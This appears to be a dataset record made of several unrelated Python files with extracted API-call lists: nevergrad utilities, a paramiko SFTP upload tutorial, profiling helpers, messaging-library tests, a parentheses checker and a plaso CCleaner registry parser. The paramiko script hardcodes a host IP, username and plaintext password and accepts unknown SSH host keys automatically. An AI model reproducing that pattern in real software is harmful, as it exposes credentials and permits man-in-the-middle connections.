isinstance(node, ast.Function): with self._function(node): body = self._function_bodies.get(node) if not body: body = '' self.out_c.write(body) self._codegen_end()
[((5221, 5266), 'os.path.relpath', 'os.path.relpath', (['self.out_h_filename', 'src_dir'], {}), '(self.out_h_filename, src_dir)\n', (5236, 5266), False, 'import os\n'), ((5169, 5202), 'os.path.realpath', 'os.path.realpath', (['self.out_c.name'], {}), '(self.out_c.name)\n', (5185, 5202), False, 'import os\n')]
mehrdad-shokri/nevergrad
nevergrad/parametrization/utils.py
7b68b00c158bf60544bc45997560edf733fb5812
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import os import sys import shutil import tempfile import subprocess import typing as tp from pathlib import Path from nevergrad.common import tools as ngtools class Descriptors: """Provides access to a set of descriptors for the parametrization This can be used within optimizers. """ # TODO add repr # pylint: disable=too-many-arguments def __init__( self, deterministic: bool = True, deterministic_function: bool = True, monoobjective: bool = True, not_manyobjective: bool = True, continuous: bool = True, metrizable: bool = True, ordered: bool = True, ) -> None: self.deterministic = deterministic self.deterministic_function = deterministic_function self.continuous = continuous self.metrizable = metrizable self.ordered = ordered self.monoobjective = monoobjective self.not_manyobjective = not_manyobjective def __and__(self, other: "Descriptors") -> "Descriptors": values = {field: getattr(self, field) & getattr(other, field) for field in self.__dict__} return Descriptors(**values) def __repr__(self) -> str: diff = ",".join(f"{x}={y}" for x, y in sorted(ngtools.different_from_defaults(instance=self, check_mismatches=True).items())) return f"{self.__class__.__name__}({diff})" class NotSupportedError(RuntimeError): """This type of operation is not supported by the parameter. """ class TemporaryDirectoryCopy(tempfile.TemporaryDirectory): # type: ignore """Creates a full copy of a directory inside a temporary directory This class can be used as TemporaryDirectory but: - the created copy path is available through the copyname attribute - the contextmanager returns the clean copy path - the directory where the temporary directory will be created can be controlled through the CLEAN_COPY_DIRECTORY environment variable """ key = "CLEAN_COPY_DIRECTORY" @classmethod def set_clean_copy_environment_variable(cls, directory: tp.Union[Path, str]) -> None: """Sets the CLEAN_COPY_DIRECTORY environment variable in order for subsequent calls to use this directory as base for the copies. """ assert Path(directory).exists(), "Directory does not exist" os.environ[cls.key] = str(directory) # pylint: disable=redefined-builtin def __init__(self, source: tp.Union[Path, str], dir: tp.Optional[tp.Union[Path, str]] = None) -> None: if dir is None: dir = os.environ.get(self.key, None) super().__init__(prefix="tmp_clean_copy_", dir=dir) self.copyname = Path(self.name) / Path(source).name shutil.copytree(str(source), str(self.copyname)) def __enter__(self) -> Path: super().__enter__() return self.copyname class FailedJobError(RuntimeError): """Job failed during processing """ class CommandFunction: """Wraps a command as a function in order to make sure it goes through the pipeline and notify when it is finished. 
The output is a string containing everything that has been sent to stdout Parameters ---------- command: list command to run, as a list verbose: bool prints the command and stdout at runtime cwd: Path/str path to the location where the command must run from Returns ------- str Everything that has been sent to stdout """ def __init__(self, command: tp.List[str], verbose: bool = False, cwd: tp.Optional[tp.Union[str, Path]] = None, env: tp.Optional[tp.Dict[str, str]] = None) -> None: if not isinstance(command, list): raise TypeError("The command must be provided as a list") self.command = command self.verbose = verbose self.cwd = None if cwd is None else str(cwd) self.env = env def __call__(self, *args: tp.Any, **kwargs: tp.Any) -> str: """Call the cammand line with addidional arguments The keyword arguments will be sent as --{key}={val} The logs are bufferized. They will be printed if the job fails, or sent as output of the function Errors are provided with the internal stderr """ # TODO make the following command more robust (probably fails in multiple cases) full_command = self.command + [str(x) for x in args] + ["--{}={}".format(x, y) for x, y in kwargs.items()] if self.verbose: print(f"The following command is sent: {full_command}") outlines: tp.List[str] = [] with subprocess.Popen(full_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=False, cwd=self.cwd, env=self.env) as process: try: assert process.stdout is not None for line in iter(process.stdout.readline, b''): if not line: break outlines.append(line.decode().strip()) if self.verbose: print(outlines[-1], flush=True) except Exception: # pylint: disable=broad-except process.kill() process.wait() raise FailedJobError("Job got killed for an unknown reason.") stderr = process.communicate()[1] # we already got stdout stdout = "\n".join(outlines) retcode = process.poll() if stderr and (retcode or self.verbose): print(stderr.decode(), file=sys.stderr) if retcode: subprocess_error = subprocess.CalledProcessError(retcode, process.args, output=stdout, stderr=stderr) raise FailedJobError(stderr.decode()) from subprocess_error return stdout
[((2787, 2817), 'os.environ.get', 'os.environ.get', (['self.key', 'None'], {}), '(self.key, None)\n', (2801, 2817), False, 'import os\n'), ((2902, 2917), 'pathlib.Path', 'Path', (['self.name'], {}), '(self.name)\n', (2906, 2917), False, 'from pathlib import Path\n'), ((4849, 4973), 'subprocess.Popen', 'subprocess.Popen', (['full_command'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE', 'shell': '(False)', 'cwd': 'self.cwd', 'env': 'self.env'}), '(full_command, stdout=subprocess.PIPE, stderr=subprocess.\n PIPE, shell=False, cwd=self.cwd, env=self.env)\n', (4865, 4973), False, 'import subprocess\n'), ((2499, 2514), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (2503, 2514), False, 'from pathlib import Path\n'), ((2920, 2932), 'pathlib.Path', 'Path', (['source'], {}), '(source)\n', (2924, 2932), False, 'from pathlib import Path\n'), ((5876, 5963), 'subprocess.CalledProcessError', 'subprocess.CalledProcessError', (['retcode', 'process.args'], {'output': 'stdout', 'stderr': 'stderr'}), '(retcode, process.args, output=stdout, stderr=\n stderr)\n', (5905, 5963), False, 'import subprocess\n'), ((1445, 1514), 'nevergrad.common.tools.different_from_defaults', 'ngtools.different_from_defaults', ([], {'instance': 'self', 'check_mismatches': '(True)'}), '(instance=self, check_mismatches=True)\n', (1476, 1514), True, 'from nevergrad.common import tools as ngtools\n')]
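As an illustration (not part of the repository file above): per the CommandFunction docstring, the wrapped command is run through subprocess and everything written to stdout comes back as a string. A minimal sketch, assuming a POSIX echo on PATH; the import path simply mirrors the repo_path above.

from nevergrad.parametrization.utils import CommandFunction

echo = CommandFunction(["echo"], verbose=True)
# Extra positional arguments are appended to the command line before it runs.
output = echo("hello", "world")
assert "hello world" in output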
airbornum/-Complete-Python-Scripting-for-Automation
Section 20/2.Document-transfer_files.py
bc053444f8786259086269ca1713bdb10144dd74
import paramiko ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(hostname='54.165.97.91',username='ec2-user',password='paramiko123',port=22) sftp_client=ssh.open_sftp() #sftp_client.get('/home/ec2-user/paramiko_download.txt','paramiko_downloaded_file.txt') #sftp_client.chdir("/home/ec2-user") #print(sftp_client.getcwd()) #sftp_client.get('demo.txt','C:\\Users\\Automation\\Desktop\\download_file.txt') sftp_client.put("transfer_files.py",'/home/ec2-user/transfer_files.py') sftp_client.close() ssh.close()
[((23, 43), 'paramiko.SSHClient', 'paramiko.SSHClient', ([], {}), '()\n', (41, 43), False, 'import paramiko\n'), ((77, 101), 'paramiko.AutoAddPolicy', 'paramiko.AutoAddPolicy', ([], {}), '()\n', (99, 101), False, 'import paramiko\n')]
gmpreussner/Varriount.NimLime
nimlime_core/utils/internal_tools.py
33da0424248bf9360c2a7cbca4a22da7a8020785
# coding=utf-8 """ Internal tools for NimLime development & testing. """ from pprint import pprint import sublime try: from cProfile import Profile except ImportError: from profile import Profile from functools import wraps from pstats import Stats try: from StringIO import StringIO except ImportError: from io import StringIO debug_on = False if debug_on: sublime.message_dialog("NimLime running in debug mode.") # Debug printer def print_debug(*args, **kwargs): """ Print when debugging. :type args: Any :type kwargs: Any """ if debug_on: pprint(*args, **kwargs) # Profiling functions profiler = Profile() profiler_running = False def profile_func(func): """ Decorator which profiles a single function. Call print_profile_data to print the collected data. :type func: Callable :rtype: Callable """ @wraps(func) def _profile_wrapper(*args, **kwargs): global profiler_running if not profiler_running: profiler_running = True try: profiler.enable() return func(*args, **kwargs) finally: profiler.disable() profiler_running = False return _profile_wrapper def print_profile_data(): """ Print the collected profile data. """ stream = StringIO() statistics = Stats(profiler, stream=stream) statistics.sort_stats('cumulative') statistics.print_stats() print(stream.getvalue())
[((658, 667), 'profile.Profile', 'Profile', ([], {}), '()\n', (665, 667), False, 'from profile import Profile\n'), ((382, 438), 'sublime.message_dialog', 'sublime.message_dialog', (['"""NimLime running in debug mode."""'], {}), "('NimLime running in debug mode.')\n", (404, 438), False, 'import sublime\n'), ((892, 903), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (897, 903), False, 'from functools import wraps\n'), ((1365, 1375), 'io.StringIO', 'StringIO', ([], {}), '()\n', (1373, 1375), False, 'from io import StringIO\n'), ((1393, 1423), 'pstats.Stats', 'Stats', (['profiler'], {'stream': 'stream'}), '(profiler, stream=stream)\n', (1398, 1423), False, 'from pstats import Stats\n'), ((600, 623), 'pprint.pprint', 'pprint', (['*args'], {}), '(*args, **kwargs)\n', (606, 623), False, 'from pprint import pprint\n')]
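As an illustration (not part of the repository file above), and assuming it runs inside Sublime Text since the module imports sublime at load time: profile_func gathers cProfile data while the decorated function executes, and print_profile_data dumps the accumulated statistics.

@profile_func
def slow_sum(n):
    # Arbitrary workload used only to generate some profile samples.
    return sum(range(n))

slow_sum(1000000)
print_profile_data()   # prints cumulative cProfile stats to the console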
dmvieira/driftage
test/unit/test_monitor.py
830188aa341029cc2a643b2b3b50e625953a35eb
import orjson from asynctest import TestCase, Mock, patch from freezegun import freeze_time from driftage.monitor import Monitor class TestMonitor(TestCase): def setUp(self): self.monitor = Monitor( "user_test@local", "pass_test", "identif" ) def tearDown(self): self.monitor.container.stop() def test_should_set_identifier_or_agent_name(self): self.assertEqual( self.monitor._identifier, "identif" ) monitor = Monitor( "user_test2@local", "pass_test" ) self.assertEqual( monitor._identifier, "user_test2" ) monitor.container.stop() @patch("driftage.monitor.WaitMonitorSubscriptions") async def test_should_add_subscription_behaviour(self, behaviour_mock): self.monitor.add_behaviour = Mock() await self.monitor.setup() self.monitor.add_behaviour.assert_called_once_with( behaviour_mock() ) @freeze_time("1989-08-12") @patch("driftage.monitor.FastNotifyContacts") @patch("driftage.monitor.Template") def test_should_notify_contacts_on_new_data( self, template_mock, behaviour_mock): self.monitor.add_behaviour = Mock() self.monitor.collect({"my data": 1}) self.monitor.add_behaviour.assert_called_once_with( behaviour_mock(), template=template_mock.return_value ) template_mock.assert_called_once_with( body=str(orjson.dumps({ "data": {"my data": 1}, "metadata": { "timestamp": 618883200.0, "identifier": "identif" } }), "utf-8") ) @freeze_time("1989-08-12") @patch("driftage.monitor.FastNotifyContacts") @patch("driftage.monitor.Template") def test_should_notify_contacts_on_new_data_with_call( self, template_mock, behaviour_mock): self.monitor.add_behaviour = Mock() self.monitor({"my data": 1}) self.monitor.add_behaviour.assert_called_once_with( behaviour_mock(), template=template_mock.return_value ) template_mock.assert_called_once_with( body=str(orjson.dumps({ "data": {"my data": 1}, "metadata": { "timestamp": 618883200.0, "identifier": "identif" } }), "utf-8") )
[((709, 759), 'asynctest.patch', 'patch', (['"""driftage.monitor.WaitMonitorSubscriptions"""'], {}), "('driftage.monitor.WaitMonitorSubscriptions')\n", (714, 759), False, 'from asynctest import TestCase, Mock, patch\n'), ((1020, 1045), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1031, 1045), False, 'from freezegun import freeze_time\n'), ((1051, 1095), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1056, 1095), False, 'from asynctest import TestCase, Mock, patch\n'), ((1101, 1135), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1106, 1135), False, 'from asynctest import TestCase, Mock, patch\n'), ((1774, 1799), 'freezegun.freeze_time', 'freeze_time', (['"""1989-08-12"""'], {}), "('1989-08-12')\n", (1785, 1799), False, 'from freezegun import freeze_time\n'), ((1805, 1849), 'asynctest.patch', 'patch', (['"""driftage.monitor.FastNotifyContacts"""'], {}), "('driftage.monitor.FastNotifyContacts')\n", (1810, 1849), False, 'from asynctest import TestCase, Mock, patch\n'), ((1855, 1889), 'asynctest.patch', 'patch', (['"""driftage.monitor.Template"""'], {}), "('driftage.monitor.Template')\n", (1860, 1889), False, 'from asynctest import TestCase, Mock, patch\n'), ((206, 256), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test@local"""', '"""pass_test"""', '"""identif"""'], {}), "('user_test@local', 'pass_test', 'identif')\n", (213, 256), False, 'from driftage.monitor import Monitor\n'), ((513, 553), 'driftage.monitor.Monitor', 'Monitor', (['"""user_test2@local"""', '"""pass_test"""'], {}), "('user_test2@local', 'pass_test')\n", (520, 553), False, 'from driftage.monitor import Monitor\n'), ((873, 879), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (877, 879), False, 'from asynctest import TestCase, Mock, patch\n'), ((1272, 1278), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (1276, 1278), False, 'from asynctest import TestCase, Mock, patch\n'), ((2036, 2042), 'asynctest.Mock', 'Mock', ([], {}), '()\n', (2040, 2042), False, 'from asynctest import TestCase, Mock, patch\n'), ((1540, 1647), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (1552, 1647), False, 'import orjson\n'), ((2296, 2403), 'orjson.dumps', 'orjson.dumps', (["{'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}}"], {}), "({'data': {'my data': 1}, 'metadata': {'timestamp': 618883200.0,\n 'identifier': 'identif'}})\n", (2308, 2403), False, 'import orjson\n')]
travisluong/fastarg
examples/todo_advanced/main.py
b21d5307ce6b296aa16f30bf220ca2ead8e9d4d3
import fastarg import commands.todo as todo import commands.user as user app = fastarg.Fastarg(description="productivity app", prog="todo") @app.command() def hello_world(name: str): """hello world""" print("hello " + name) app.add_fastarg(todo.app, name="todo") app.add_fastarg(user.app, name="user") if __name__ == "__main__": app.run()
[((80, 140), 'fastarg.Fastarg', 'fastarg.Fastarg', ([], {'description': '"""productivity app"""', 'prog': '"""todo"""'}), "(description='productivity app', prog='todo')\n", (95, 140), False, 'import fastarg\n')]
rwilhelm/aiormq
tests/test_channel.py
9aa278e61d16ba18748f5f5a3fc76d0a273fd14a
import asyncio import uuid import pytest from aiomisc_pytest.pytest_plugin import TCPProxy import aiormq async def test_simple(amqp_channel: aiormq.Channel): await amqp_channel.basic_qos(prefetch_count=1) assert amqp_channel.number queue = asyncio.Queue() deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put) await amqp_channel.basic_publish( b"foo", routing_key=deaclare_ok.queue, properties=aiormq.spec.Basic.Properties(message_id="123"), ) message = await queue.get() # type: DeliveredMessage assert message.body == b"foo" cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag) assert cancel_ok.consumer_tag == consume_ok.consumer_tag assert cancel_ok.consumer_tag not in amqp_channel.consumers await amqp_channel.queue_delete(deaclare_ok.queue) deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue) message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True) assert message.body == b"foo bar" async def test_blank_body(amqp_channel: aiormq.Channel): await amqp_channel.basic_qos(prefetch_count=1) assert amqp_channel.number queue = asyncio.Queue() deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) consume_ok = await amqp_channel.basic_consume(deaclare_ok.queue, queue.put) await amqp_channel.basic_publish( b"", routing_key=deaclare_ok.queue, properties=aiormq.spec.Basic.Properties(message_id="123"), ) message = await queue.get() # type: DeliveredMessage assert message.body == b"" cancel_ok = await amqp_channel.basic_cancel(consume_ok.consumer_tag) assert cancel_ok.consumer_tag == consume_ok.consumer_tag assert cancel_ok.consumer_tag not in amqp_channel.consumers await amqp_channel.queue_delete(deaclare_ok.queue) deaclare_ok = await amqp_channel.queue_declare(auto_delete=True) await amqp_channel.basic_publish(b"foo bar", routing_key=deaclare_ok.queue) message = await amqp_channel.basic_get(deaclare_ok.queue, no_ack=True) assert message.body == b"foo bar" @pytest.mark.no_catch_loop_exceptions async def test_bad_consumer(amqp_channel: aiormq.Channel, loop): channel = amqp_channel # type: aiormq.Channel await channel.basic_qos(prefetch_count=1) declare_ok = await channel.queue_declare() future = loop.create_future() await channel.basic_publish(b"urgent", routing_key=declare_ok.queue) consumer_tag = loop.create_future() async def bad_consumer(message): await channel.basic_cancel(await consumer_tag) future.set_result(message) raise Exception consume_ok = await channel.basic_consume( declare_ok.queue, bad_consumer, no_ack=False, ) consumer_tag.set_result(consume_ok.consumer_tag) message = await future await channel.basic_reject(message.delivery.delivery_tag, requeue=True) assert message.body == b"urgent" future = loop.create_future() await channel.basic_consume( declare_ok.queue, future.set_result, no_ack=True, ) message = await future assert message.body == b"urgent" async def test_ack_nack_reject(amqp_channel: aiormq.Channel): channel = amqp_channel # type: aiormq.Channel await channel.basic_qos(prefetch_count=1) declare_ok = await channel.queue_declare(auto_delete=True) queue = asyncio.Queue() await channel.basic_consume(declare_ok.queue, queue.put, no_ack=False) await channel.basic_publish(b"rejected", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"rejected" await channel.basic_reject(message.delivery.delivery_tag, requeue=False) await 
channel.basic_publish(b"nacked", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"nacked" await channel.basic_nack(message.delivery.delivery_tag, requeue=False) await channel.basic_publish(b"acked", routing_key=declare_ok.queue) message = await queue.get() assert message.body == b"acked" await channel.basic_ack(message.delivery.delivery_tag) async def test_confirm_multiple(amqp_channel: aiormq.Channel): """ RabbitMQ has been observed to send confirmations in a strange pattern when publishing simultaneously where only some messages are delivered to a queue. It sends acks like this 1 2 4 5(multiple, confirming also 3). This test is probably inconsequential without publisher_confirms This is a regression for https://github.com/mosquito/aiormq/issues/10 """ channel = amqp_channel # type: aiormq.Channel exchange = uuid.uuid4().hex await channel.exchange_declare(exchange, exchange_type="topic") try: declare_ok = await channel.queue_declare(exclusive=True) await channel.queue_bind( declare_ok.queue, exchange, routing_key="test.5", ) for i in range(10): messages = [ asyncio.ensure_future(channel.basic_publish( b"test", exchange=exchange, routing_key="test.{}".format(i), )) for i in range(10) ] _, pending = await asyncio.wait(messages, timeout=0.2) assert not pending, "not all publishes were completed (confirmed)" await asyncio.sleep(0.05) finally: await channel.exchange_delete(exchange) async def test_exclusive_queue_locked(amqp_connection): channel0 = await amqp_connection.channel() channel1 = await amqp_connection.channel() qname = str(uuid.uuid4()) await channel0.queue_declare(qname, exclusive=True) try: await channel0.basic_consume(qname, print, exclusive=True) with pytest.raises(aiormq.exceptions.ChannelLockedResource): await channel1.queue_declare(qname) await channel1.basic_consume(qname, print, exclusive=True) finally: await channel0.queue_delete(qname) async def test_remove_writer_when_closed(amqp_channel: aiormq.Channel): with pytest.raises(aiormq.exceptions.ChannelClosed): await amqp_channel.queue_declare( "amq.forbidden_queue_name", auto_delete=True, ) with pytest.raises(aiormq.exceptions.ChannelInvalidStateError): await amqp_channel.queue_delete("amq.forbidden_queue_name") async def test_proxy_connection(proxy_connection, proxy: TCPProxy): channel = await proxy_connection.channel() # type: aiormq.Channel await channel.queue_declare(auto_delete=True) async def test_declare_queue_timeout(proxy_connection, proxy: TCPProxy): for _ in range(3): channel = await proxy_connection.channel() # type: aiormq.Channel qname = str(uuid.uuid4()) with proxy.slowdown(read_delay=5, write_delay=0): with pytest.raises(asyncio.TimeoutError): await channel.queue_declare( qname, auto_delete=True, timeout=0.5 )
[((257, 272), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (270, 272), False, 'import asyncio\n'), ((1354, 1369), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (1367, 1369), False, 'import asyncio\n'), ((3581, 3596), 'asyncio.Queue', 'asyncio.Queue', ([], {}), '()\n', (3594, 3596), False, 'import asyncio\n'), ((4831, 4843), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4841, 4843), False, 'import uuid\n'), ((5774, 5786), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5784, 5786), False, 'import uuid\n'), ((6250, 6296), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelClosed'], {}), '(aiormq.exceptions.ChannelClosed)\n', (6263, 6296), False, 'import pytest\n'), ((6418, 6475), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelInvalidStateError'], {}), '(aiormq.exceptions.ChannelInvalidStateError)\n', (6431, 6475), False, 'import pytest\n'), ((5936, 5990), 'pytest.raises', 'pytest.raises', (['aiormq.exceptions.ChannelLockedResource'], {}), '(aiormq.exceptions.ChannelLockedResource)\n', (5949, 5990), False, 'import pytest\n'), ((6930, 6942), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (6940, 6942), False, 'import uuid\n'), ((535, 581), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (563, 581), False, 'import aiormq\n'), ((1629, 1675), 'aiormq.spec.Basic.Properties', 'aiormq.spec.Basic.Properties', ([], {'message_id': '"""123"""'}), "(message_id='123')\n", (1657, 1675), False, 'import aiormq\n'), ((5391, 5426), 'asyncio.wait', 'asyncio.wait', (['messages'], {'timeout': '(0.2)'}), '(messages, timeout=0.2)\n', (5403, 5426), False, 'import asyncio\n'), ((5524, 5543), 'asyncio.sleep', 'asyncio.sleep', (['(0.05)'], {}), '(0.05)\n', (5537, 5543), False, 'import asyncio\n'), ((7020, 7055), 'pytest.raises', 'pytest.raises', (['asyncio.TimeoutError'], {}), '(asyncio.TimeoutError)\n', (7033, 7055), False, 'import pytest\n')]
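As an illustration (not part of the repository file above): a hedged, standalone sketch of the publish/get round trip these tests exercise, assuming a RabbitMQ broker on localhost with default guest credentials.

import asyncio
import aiormq

async def main():
    connection = await aiormq.connect("amqp://guest:guest@localhost/")  # assumed local broker
    channel = await connection.channel()
    declare_ok = await channel.queue_declare(auto_delete=True)
    await channel.basic_publish(b"hello", routing_key=declare_ok.queue)
    message = await channel.basic_get(declare_ok.queue, no_ack=True)
    print(message.body)          # b'hello'
    await connection.close()

asyncio.run(main())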
culbertm/NSttyPython
nitro-python/nssrc/com/citrix/netscaler/nitro/resource/stat/mediaclassification/__init__.py
ff9f6aedae3fb8495342cd0fc4247c819cf47397
__all__ = ['mediaclassification_stats']
[]
joeghodsi/interview-questions
balanced_parens.py
3e4eb76891245ce978cb9171e87d60e3b292b0a8
''' Problem description: Given a string, determine whether or not the parentheses are balanced ''' def balanced_parens(str): ''' runtime: O(n) space : O(1) ''' if str is None: return True open_count = 0 for char in str: if char == '(': open_count += 1 elif char == ')': open_count -= 1 if open_count < 0: return False return open_count == 0
[]
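As an illustration (not part of the repository file above), a few calls tracing the counter logic:

assert balanced_parens("(())") is True    # opens and closes match
assert balanced_parens("((") is False     # left unclosed, counter ends at 2
assert balanced_parens("())(") is False   # closes before it opens, early exit
assert balanced_parens(None) is True      # None is treated as trivially balanced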
pyllyukko/plaso
plaso/parsers/winreg_plugins/ccleaner.py
7533db2d1035ca71d264d6281ebd5db2d073c587
# -*- coding: utf-8 -*- """Parser for the CCleaner Registry key.""" import re from dfdatetime import time_elements as dfdatetime_time_elements from plaso.containers import events from plaso.containers import time_events from plaso.lib import definitions from plaso.parsers import winreg_parser from plaso.parsers.winreg_plugins import interface class CCleanerConfigurationEventData(events.EventData): """CCleaner configuration event data. Attributes: configuration (str): CCleaner configuration. key_path (str): Windows Registry key path. """ DATA_TYPE = 'ccleaner:configuration' def __init__(self): """Initializes event data.""" super(CCleanerConfigurationEventData, self).__init__( data_type=self.DATA_TYPE) self.configuration = None self.key_path = None class CCleanerUpdateEventData(events.EventData): """CCleaner update event data. Attributes: key_path (str): Windows Registry key path. """ DATA_TYPE = 'ccleaner:update' def __init__(self): """Initializes event data.""" super(CCleanerUpdateEventData, self).__init__(data_type=self.DATA_TYPE) self.key_path = None class CCleanerPlugin(interface.WindowsRegistryPlugin): """Gathers the CCleaner Keys for NTUSER hive. Known Windows Registry values within the CCleaner key: * (App)Cookies [REG_SZ], contains "True" if the cookies should be cleaned; * (App)Delete Index.dat files [REG_SZ] * (App)History [REG_SZ] * (App)Last Download Location [REG_SZ] * (App)Other Explorer MRUs [REG_SZ] * (App)Recent Documents [REG_SZ] * (App)Recently Typed URLs [REG_SZ] * (App)Run (in Start Menu) [REG_SZ] * (App)Temporary Internet Files [REG_SZ] * (App)Thumbnail Cache [REG_SZ] * CookiesToSave [REG_SZ] * UpdateKey [REG_SZ], contains a date and time formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M", for example "07/13/2013 10:03:14 AM"; * WINDOW_HEIGHT [REG_SZ], contains the windows height in number of pixels; * WINDOW_LEFT [REG_SZ] * WINDOW_MAX [REG_SZ] * WINDOW_TOP [REG_SZ] * WINDOW_WIDTH [REG_SZ], contains the windows width in number of pixels; Also see: http://cheeky4n6monkey.blogspot.com/2012/02/writing-ccleaner-regripper-plugin-part_05.html """ NAME = 'ccleaner' DATA_FORMAT = 'CCleaner Registry data' FILTERS = frozenset([ interface.WindowsRegistryKeyPathFilter( 'HKEY_CURRENT_USER\\Software\\Piriform\\CCleaner')]) # Date and time string formatted as: "MM/DD/YYYY hh:mm:ss [A|P]M" # for example "07/13/2013 10:03:14 AM" # TODO: determine if this is true for other locales. _UPDATE_DATE_TIME_RE = re.compile( r'([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ' r'([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)') def _ParseUpdateKeyValue(self, parser_mediator, registry_value): """Parses the UpdateKey value. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. registry_value (dfwinreg.WinRegistryValue): Windows Registry value. Returns: dfdatetime_time_elements.TimeElements: date and time value or None if not available. 
""" if not registry_value.DataIsString(): parser_mediator.ProduceExtractionWarning( 'unsupported UpdateKey value data type: {0:s}'.format( registry_value.data_type_string)) return None date_time_string = registry_value.GetDataAsObject() if not date_time_string: parser_mediator.ProduceExtractionWarning('missing UpdateKey value data') return None re_match = self._UPDATE_DATE_TIME_RE.match(date_time_string) if not re_match: parser_mediator.ProduceExtractionWarning( 'unsupported UpdateKey value data: {0!s}'.format(date_time_string)) return None month, day_of_month, year, hours, minutes, seconds, part_of_day = ( re_match.groups()) try: year = int(year, 10) month = int(month, 10) day_of_month = int(day_of_month, 10) hours = int(hours, 10) minutes = int(minutes, 10) seconds = int(seconds, 10) except (TypeError, ValueError): parser_mediator.ProduceExtractionWarning( 'invalid UpdateKey date time value: {0!s}'.format(date_time_string)) return None if part_of_day == 'PM': hours += 12 time_elements_tuple = (year, month, day_of_month, hours, minutes, seconds) try: date_time = dfdatetime_time_elements.TimeElements( time_elements_tuple=time_elements_tuple) date_time.is_local_time = True except ValueError: parser_mediator.ProduceExtractionWarning( 'invalid UpdateKey date time value: {0!s}'.format( time_elements_tuple)) return None return date_time def ExtractEvents(self, parser_mediator, registry_key, **kwargs): """Extracts events from a Windows Registry key. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. registry_key (dfwinreg.WinRegistryKey): Windows Registry key. """ configuration = [] date_time = None for registry_value in registry_key.GetValues(): if not registry_value.name or not registry_value.data: continue if registry_value.name == 'UpdateKey': date_time = self._ParseUpdateKeyValue(parser_mediator, registry_value) else: value = registry_value.GetDataAsObject() configuration.append('{0:s}: {1!s}'.format(registry_value.name, value)) if date_time: event_data = CCleanerUpdateEventData() event_data.key_path = registry_key.path event = time_events.DateTimeValuesEvent( date_time, definitions.TIME_DESCRIPTION_UPDATE, time_zone=parser_mediator.timezone) parser_mediator.ProduceEventWithEventData(event, event_data) event_data = CCleanerConfigurationEventData() event_data.configuration = ' '.join(sorted(configuration)) or None event_data.key_path = registry_key.path event = time_events.DateTimeValuesEvent( registry_key.last_written_time, definitions.TIME_DESCRIPTION_WRITTEN) parser_mediator.ProduceEventWithEventData(event, event_data) winreg_parser.WinRegistryParser.RegisterPlugin(CCleanerPlugin)
[((6270, 6332), 'plaso.parsers.winreg_parser.WinRegistryParser.RegisterPlugin', 'winreg_parser.WinRegistryParser.RegisterPlugin', (['CCleanerPlugin'], {}), '(CCleanerPlugin)\n', (6316, 6332), False, 'from plaso.parsers import winreg_parser\n'), ((2611, 2731), 're.compile', 're.compile', (['"""([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)"""'], {}), "(\n '([0-9][0-9])/([0-9][0-9])/([0-9][0-9][0-9][0-9]) ([0-9][0-9]):([0-9][0-9]):([0-9][0-9]) ([A|P]M)'\n )\n", (2621, 2731), False, 'import re\n'), ((6092, 6198), 'plaso.containers.time_events.DateTimeValuesEvent', 'time_events.DateTimeValuesEvent', (['registry_key.last_written_time', 'definitions.TIME_DESCRIPTION_WRITTEN'], {}), '(registry_key.last_written_time, definitions\n .TIME_DESCRIPTION_WRITTEN)\n', (6123, 6198), False, 'from plaso.containers import time_events\n'), ((2318, 2412), 'plaso.parsers.winreg_plugins.interface.WindowsRegistryKeyPathFilter', 'interface.WindowsRegistryKeyPathFilter', (['"""HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner"""'], {}), "(\n 'HKEY_CURRENT_USER\\\\Software\\\\Piriform\\\\CCleaner')\n", (2356, 2412), False, 'from plaso.parsers.winreg_plugins import interface\n'), ((4463, 4541), 'dfdatetime.time_elements.TimeElements', 